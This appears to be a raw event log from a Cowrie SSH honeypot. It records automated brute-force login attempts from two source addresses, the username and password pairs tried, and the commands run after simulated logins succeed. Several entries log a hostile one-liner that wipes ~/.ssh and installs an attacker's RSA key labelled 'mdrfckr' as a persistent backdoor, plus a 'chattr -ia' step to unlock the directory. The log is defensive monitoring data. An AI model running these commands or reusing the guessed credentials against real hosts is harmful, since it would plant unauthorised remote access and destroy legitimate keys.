{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:44:35.375293Z","src_ip":"212.227.235.229","session":"a72fcb816138"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:35.377928Z","src_ip":"212.227.235.229","session":"b5dc3aaf576a"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:35.379036Z","src_ip":"212.227.235.229","session":"cc3a7ca3ded9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:44:35.550966Z","src_ip":"212.227.235.229","session":"a72fcb816138"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:35.551811Z","src_ip":"212.227.235.229","session":"a72fcb816138"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34346,"dst_ip":"1.2.3.4","dst_port":22,"session":"17212898e8ed","protocol":"ssh","message":"New connection: 212.227.235.229:34346 (1.2.3.4:22) [session: 17212898e8ed]","sensor":"my-vps","timestamp":"2025-09-09T05:44:35.732485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:44:35.733120Z","src_ip":"212.227.235.229","session":"17212898e8ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:44:35.912693Z","src_ip":"212.227.235.229","session":"17212898e8ed"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:44:36.665721Z","src_ip":"212.227.235.229","session":"17212898e8ed"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:37.846263Z","src_ip":"212.227.235.229","session":"17212898e8ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35176,"dst_ip":"1.2.3.4","dst_port":22,"session":"4946a8cac395","protocol":"ssh","message":"New connection: 212.227.235.229:35176 (1.2.3.4:22) [session: 4946a8cac395]","sensor":"my-vps","timestamp":"2025-09-09T05:44:38.027029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:44:38.027818Z","src_ip":"212.227.235.229","session":"4946a8cac395"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:44:38.201207Z","src_ip":"212.227.235.229","session":"4946a8cac395"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:44:38.925194Z","src_ip":"212.227.235.229","session":"4946a8cac395"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:39.095551Z","src_ip":"212.227.235.229","session":"a72fcb816138"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:39.097578Z","src_ip":"212.227.235.229","session":"4946a8cac395"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64730,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac8b88b7a20f","protocol":"ssh","message":"New connection: 212.227.235.229:64730 (1.2.3.4:22) [session: ac8b88b7a20f]","sensor":"my-vps","timestamp":"2025-09-09T05:45:11.778046Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:45:11.778721Z","src_ip":"212.227.235.229","session":"ac8b88b7a20f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:45:11.913370Z","src_ip":"212.227.235.229","session":"ac8b88b7a20f"}
{"eventid":"cowrie.login.failed","username":"tunnel","password":"changeme","message":"login attempt [tunnel/changeme] failed","sensor":"my-vps","timestamp":"2025-09-09T05:45:12.504827Z","src_ip":"212.227.235.229","session":"ac8b88b7a20f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:45:13.635891Z","src_ip":"212.227.235.229","session":"ac8b88b7a20f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48194,"dst_ip":"1.2.3.4","dst_port":22,"session":"15f971e9c2b4","protocol":"ssh","message":"New connection: 212.227.235.229:48194 (1.2.3.4:22) [session: 15f971e9c2b4]","sensor":"my-vps","timestamp":"2025-09-09T05:45:16.006490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:45:16.007516Z","src_ip":"212.227.235.229","session":"15f971e9c2b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:45:16.088380Z","src_ip":"212.227.235.229","session":"15f971e9c2b4"}
{"eventid":"cowrie.login.failed","username":"raspberry","password":"Welcome1","message":"login attempt [raspberry/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T05:45:16.455056Z","src_ip":"212.227.235.229","session":"15f971e9c2b4"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:45:17.538738Z","src_ip":"212.227.235.229","session":"15f971e9c2b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57803,"dst_ip":"1.2.3.4","dst_port":22,"session":"de012e3b9dc4","protocol":"ssh","message":"New connection: 212.227.235.229:57803 (1.2.3.4:22) [session: de012e3b9dc4]","sensor":"my-vps","timestamp":"2025-09-09T05:45:24.608227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:45:24.608921Z","src_ip":"212.227.235.229","session":"de012e3b9dc4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:45:24.696688Z","src_ip":"212.227.235.229","session":"de012e3b9dc4"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres@123","message":"login attempt [postgres/postgres@123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:45:25.085928Z","src_ip":"212.227.235.229","session":"de012e3b9dc4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:45:26.175572Z","src_ip":"212.227.235.229","session":"de012e3b9dc4"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":45566,"dst_ip":"1.2.3.4","dst_port":22,"session":"c89307f1b457","protocol":"ssh","message":"New connection: 213.6.203.226:45566 (1.2.3.4:22) [session: c89307f1b457]","sensor":"my-vps","timestamp":"2025-09-09T05:45:30.369226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:45:30.370161Z","src_ip":"213.6.203.226","session":"c89307f1b457"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:45:30.438684Z","src_ip":"213.6.203.226","session":"c89307f1b457"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd@","message":"login attempt [root/p@ssw0rd@] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:45:30.751520Z","src_ip":"213.6.203.226","session":"c89307f1b457"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:45:30.959037Z","src_ip":"213.6.203.226","session":"c89307f1b457"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:45:30.959786Z","src_ip":"213.6.203.226","session":"c89307f1b457"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:45:30.960613Z","src_ip":"213.6.203.226","session":"c89307f1b457"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:45:31.030162Z","src_ip":"213.6.203.226","session":"c89307f1b457"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:45:31.190008Z","src_ip":"213.6.203.226","session":"c89307f1b457"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:45:31.190855Z","src_ip":"213.6.203.226","session":"c89307f1b457"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:45:31.261643Z","src_ip":"213.6.203.226","session":"c89307f1b457"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:45:31.262568Z","src_ip":"213.6.203.226","session":"c89307f1b457"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":44958,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ed178a41d83","protocol":"ssh","message":"New connection: 213.6.203.226:44958 (1.2.3.4:22) [session: 3ed178a41d83]","sensor":"my-vps","timestamp":"2025-09-09T05:45:31.328342Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:45:31.329251Z","src_ip":"213.6.203.226","session":"3ed178a41d83"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:45:31.396848Z","src_ip":"213.6.203.226","session":"3ed178a41d83"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:45:31.707967Z","src_ip":"213.6.203.226","session":"3ed178a41d83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55040,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3bf5ccce88e","protocol":"ssh","message":"New connection: 212.227.235.229:55040 (1.2.3.4:22) [session: f3bf5ccce88e]","sensor":"my-vps","timestamp":"2025-09-09T05:45:32.514861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:45:32.516008Z","src_ip":"212.227.235.229","session":"f3bf5ccce88e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zl